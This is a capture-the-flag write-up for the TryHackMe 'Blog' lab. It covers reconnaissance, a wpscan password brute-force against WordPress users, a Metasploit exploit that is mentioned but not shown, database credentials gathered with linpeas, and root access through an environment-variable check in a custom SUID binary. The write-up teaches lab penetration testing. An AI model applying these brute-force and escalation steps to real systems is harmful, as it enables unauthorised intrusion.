15 KiB
TryHackMe-Blog
NMAP
Nmap scan report for 10.10.62.12
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2020-11-11T18:34:52+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-11T18:34:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
PORT 139/445 (SMB)
We know that there are smb shares on this box so let's see which shares we can access
Let's grab the two photos from here and save it on our local machine
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec)
smb: \>
Now we will see that there is a qr-image so use zbarimg to see what text we get from it
root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png
QR-Code:https://qrgo.page.link/M6dE
We will get a link that points to a video on youtube Billy Joel - We Didn't Start the Fire (Official Video) .
This seems like a rabbithole ....
root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg
Enter passphrase:
wrote extracted data to "rabbit_hole.txt".
root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
root@kali:~/TryHackMe/Medium/Blog#
And I was right being in the wrong path :D
PORT 80
Moving on to web page
Now your seeing this page like this because we have to add blog.thm into our /etc/hosts/
Now it's loading properly
Looking at robots.txt
I found a wordpress login page
Gobuster
gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt
2020/11/11 23:56:33 Starting gobuster
===============================================================
/! (Status: 301)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/0000 (Status: 301)
/2020 (Status: 301)
/admin (Status: 302)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 200)
/feed (Status: 301)
/fixed! (Status: 301)
Progress: 9204 / 20470 (44.96%
I didn't find anything interesting with gobuster so doing something with wordpress login page is the only way in
WPSCAN
I used wpscan to enumerate for users and wordpress version
oot@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.62.12/ [10.10.62.12]
[+] Started: Thu Nov 12 00:15:15 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://10.10.62.12/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
[i] User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)
[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Thu Nov 12 00:17:18 2020
[+] Requests Done: 3086
[+] Cached Requests: 30
[+] Data Sent: 762.895 KB
[+] Data Received: 1.192 MB
[+] Memory used: 230.801 MB
[+] Elapsed time: 00:02:03
And I found two users bjoel and kwheel lets put this in a text file bruteforce thier passwords
wpscan --url http://blog.thm -U users.txt -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blog.thm/ [10.10.62.12]
[+] Started: Thu Nov 12 00:27:33 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://blog.thm/robots.txt
| Interesting Entries:
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - kwheel / cutiepie1
Trying bjoel / heaven1 Time: 00:07:54 < > (6030 / 28691649) 0.02%
It took some time but we got khweel's passwords
And now we logged in as khweel in wordpress
Then I did a litte resarch on goole if there's an exploit available for wordpress 5.0
So there's an exploit available for it on metasploit
You could also search for it on searchsploit and it's going to show up as it's on exploit-db
But I will be using metasploit because a tool is available for you why not use it :D
I tried to use it but it kept failing, after quite sometime and restarted metasploit and then the exploit worked
I didn't find anythin in bjoel's home directory I quickly ran linpeas
These were the things I found out of linpeas
define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'LittleYellowLamp90!@');
define('DB_HOST', 'localhost');
Now a mysql database must be ruuning on localhost so lets try to login with these credentials
As we can see DB_NAME is blog
mysql> use blog
use blog
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_blog |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql>
I ran command to select all entries in wp_users
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| 1 | bjoel | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel | nconkl1@outlook.com | | 2020-05-26 03:52:26 | | 0 | Billy Joel |
| 3 | kwheel | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel | zlbiydwrtfjhmuuymk@ttirv.net | | 2020-05-26 03:57:39 | | 0 | Karen Wheeler |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
Let's try cracking these hashes
But this was useless as we already got that password
I then tried to run /usr/sbin/checker and it looked like it is customized
This looks like Buffer Overflow exploitation
This tells that there's variable that is holds bash variable $admin's value and it's comparing it wheather it's empty or not so you can see that on null value it would terminate so we need to set the value true
www-data@blog:/media$ export admin=true
export admin=true
www-data@blog:/media$ echo $admin
echo $admin
true
www-data@blog:/media$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/media#